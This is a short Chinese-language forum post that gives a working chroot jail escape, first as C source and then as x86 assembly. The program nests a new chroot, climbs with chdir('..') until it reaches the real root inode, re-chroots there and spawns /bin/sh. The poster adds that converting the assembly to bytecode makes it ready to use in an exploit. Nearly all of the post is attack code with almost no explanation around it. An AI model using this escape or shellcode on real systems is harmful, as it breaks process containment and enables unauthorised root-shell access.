- 论坛徽章:
- 0
|
#include "string.h"
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
int main()
{
int i;
struct stat sb;
mkdir("A", 0755);
chroot("A");
for(i = 0; i < 1024; i ++){
puts("HERE");
memset(&sb, 0, sizeof(sb));
chdir("..");
stat(".", &sb);
if(sb.st_ino == 2){
chroot(".");
system("/bin/sh");
exit(0);
}
}
puts("failure");
return 0;
}
|
让我失望了chroot jail....
man 2 stat查相关stat.
.globl main
.type main, @function
main:
leal 4(%esp), %ecx
andl $-16, %esp
pushl -4(%ecx)
pushl %ebp
movl %esp, %ebp
pushl %ecx
subl $116, %esp
movl $493, 4(%esp)
movl $.LC0, (%esp)
call mkdir
movl $.LC0, (%esp)
call chroot
movl $0, -8(%ebp)
jmp .L2
.L3:
movl $.LC1, (%esp)
call puts
movl $88, 8(%esp)
movl $0, 4(%esp)
leal -96(%ebp), %eax
movl %eax, (%esp)
call memset
movl $.LC2, (%esp)
call chdir
leal -96(%ebp), %eax
movl %eax, 4(%esp)
movl $.LC3, (%esp)
call stat
movl -84(%ebp), %eax
cmpl $2, %eax
jne .L4
movl $.LC3, (%esp)
call chroot
movl $.LC4, (%esp)
call system
movl $0, (%esp)
call exit
.L4:
addl $1, -8(%ebp)
.L2:
cmpl $1023, -8(%ebp)
jle .L3
movl $.LC5, (%esp)
call puts
movl $0, %eax
addl $116, %esp
popl %ecx
popl %ebp
leal -4(%ecx), %esp
ret
|
对了,如果把汇编转化为字节码,就可以exploit使用了
[ 本帖最后由 c_acceleration 于 2008-5-11 23:37 编辑 ] |
|